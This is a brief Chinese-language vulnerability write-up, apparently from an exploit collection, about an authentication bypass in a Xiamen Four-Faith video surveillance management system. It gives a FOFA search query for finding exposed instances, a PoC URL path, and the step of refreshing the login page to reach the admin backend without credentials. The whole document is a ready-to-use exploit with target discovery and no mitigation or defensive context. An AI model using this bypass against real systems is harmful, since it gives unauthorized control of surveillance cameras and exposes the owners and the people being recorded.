## 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞

厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞，可直接绕过登录进入后台。

## fofa

```
body="/monitor/realt/init?curPageId=a1"
```

## poc

```
/mgrcter/usermgr/user/Login.action
```

![image-20240707202135740](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072021787.png)

返回登录页面刷新一下进后台。

![image-20240707202157609](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072021698.png)